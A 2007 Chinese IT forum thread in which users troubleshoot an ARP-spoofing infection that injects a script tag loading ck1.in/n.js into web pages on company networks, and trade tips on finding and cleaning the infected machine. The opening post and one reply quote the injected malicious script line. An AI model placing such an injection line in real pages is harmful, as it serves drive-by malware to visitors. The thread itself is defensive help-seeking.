急救!!!!关于ck1.in/n.js的问题

edsition · 发表于 2007-7-21 11:16:50

公司里的电脑中了网上流传的ck1.in/n.js的病毒,所有的电脑在登陆OA后标题显示不出来了,是浏览asp之类的网页会在最前端插入

<script src=http://ck1.in/n.js></script>但这个ARP病毒不期骗网关,所心分析不出来,请各位大使帮帮忙!!1!

[ 本帖最后由 edsition 于 2007-7-21 11:21 编辑 ]

twoeyes · 发表于 2007-7-21 13:23:53

是arp欺骗的问题，找到发起arp欺骗的那台机器，先将其隔离，然后对其进行查杀。

csllff · 发表于 2007-7-21 14:20:13

不是什么arp欺骗都要用网络分析得，这个是 arp欺骗挂马
网关mac会改变得

twoeyes · 发表于 2007-7-22 09:05:17

总之是因arp欺骗方式引起的网络问题，只要找到那台发起arp欺骗的机器就可以解决问题。

wwhonline · 发表于 2007-7-23 09:57:57

这个病毒好利害，我公司现在也存在这个问题，发作的时候会影响公司的其中几台机器打开其中一些网页就会出现 <script src=http://ck1.in/N.JS></script>这行代码。但把网络重启了之后就又正常。而且中毒的机器就算杀毒软件也杀不清的（ps:装的卡巴斯基7.0）一重启问题依旧
而且他还有一个高招，他会打中毒的机器上面的host 文件自动识别删除。
个人认为不只是单纯的ARP病毒，可能是新的木马

[ 本帖最后由 wwhonline 于 2007-7-23 10:03 编辑 ]

只是一个神话 · 发表于 2007-7-23 10:04:12

现在杀毒软件已经不行了，很多病毒是直接以服务方式开机自运行的，用AUTORUNS把可疑的服务删了。我也遇到过类似ＡＲＰ病毒，其实对于ＡＲＰ欺骗，只要知道网关ＭＡＣ就能排查出网络内是否有ＡＲＰ欺骗攻击。当然，要排查到具体的主机上还要看网管员平时对网络内主机的了解情况了。

twoeyes · 发表于 2007-7-23 16:56:41

arp欺骗不应当算是病毒类，应该属于木马一类网络攻击软件，正因这个原因所以绝大部分的杀毒软件对arp欺骗不起作用。个人观点仅供参考。

crazyblackboy · 发表于 2007-7-24 13:37:38

ck1.in/n.js这个ARP欺骗好像并不串改网关的MAC地址。用ARP SNIFFER这种软件开启自动保护之后也不能检测到报警。好麻烦啊而且是时断时续的发作严重影响工作

有成功解决这个病毒的大人来说说经历么

wwhonline · 发表于 2007-7-25 15:07:33

http://www.csna.cn/forum.php?mod ... &extra=page%3D1